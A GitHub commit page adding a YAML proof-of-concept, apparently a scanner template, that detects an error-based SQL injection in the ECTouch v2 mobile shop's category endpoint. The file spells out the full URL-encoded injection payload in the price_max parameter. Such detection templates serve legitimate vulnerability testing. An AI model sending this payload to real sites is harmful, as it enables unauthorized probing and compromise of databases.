Skip to content

Commit

Permalink
add new poc
Browse files Browse the repository at this point in the history
  • Loading branch information
virusdefender committed Sep 18, 2019
1 parent 39bbc93 commit c216fca
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 0 deletions.
File renamed without changes.
12 changes: 12 additions & 0 deletions pocs/etouch-v2-sqli-2.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
name: poc-yaml-etouch-v2-sqli
rules:
- method: GET
path: >-
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
expression: |
status==200 && body.bcontains(b'c4ca4238a0b923820dcc509a6f75849b')
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/mstxq17/CodeCheck/
- https://www.anquanke.com/post/id/168991

0 comments on commit c216fca

Please sign in to comment.